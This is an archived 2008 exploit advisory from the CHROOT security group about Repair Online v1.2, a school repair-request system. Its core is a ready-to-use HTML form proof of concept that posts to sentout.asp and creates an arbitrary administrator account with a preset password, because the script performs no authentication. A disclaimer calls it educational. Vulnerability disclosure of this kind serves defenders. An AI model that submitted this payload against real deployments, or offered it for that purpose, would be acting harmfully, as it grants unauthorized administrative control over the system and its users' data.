Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19912
HistoryMay 27, 2008 - 12:00 a.m.

Repair Online v1.2 (sentout) Create Admin Vulnerability

2008-05-2700:00:00
vulners.com
11

/ | || | _ \| _ | _ | |
| (
| _ | [)/| () | () | | |
\_____|
| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org

                 _   _ _ _____ ____ ____ __  _ 

Hacks In Taiwan | || | | | | | \| |
Conference 2008 | _ | | | | | (
| () | |
|
| ||| || \|||\__|
http://www.hitcon.org

Title :: Repair Online v1.2 (sentout) Create Admin Vulnerability

Author :: unohope [at] chroot [dot] org

IRC :: irc.chroot.org #chroot

ScriptName :: 校園報修系統 v1.2

Download :: http://netlab.kh.edu.tw/download/線上報修系統v12.exe

Mirror :: http://www.files.to/get/280246/c8pqqs4ug0


[Create Admin]

  • {sentout.asp} -

<form action="http://localhost/repair/pwd/sentout.asp&quot; method="post">
user: <input type="text" name="pID" value="adm2"><br>
pass: <input type="text" name="Pwd" value="123456">
<input type="hidden" name="pFrom" value="N/A">
<input type="hidden" name="pName" value="N/A">
<input type="hidden" name="pTag" value="z,repair,leader">
<input type="submit" value="add">
</form>

It didn't check out anything else,
We just create a new administrator account arbitrarily,
faint


[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

2008/5/24 - chrO.ot group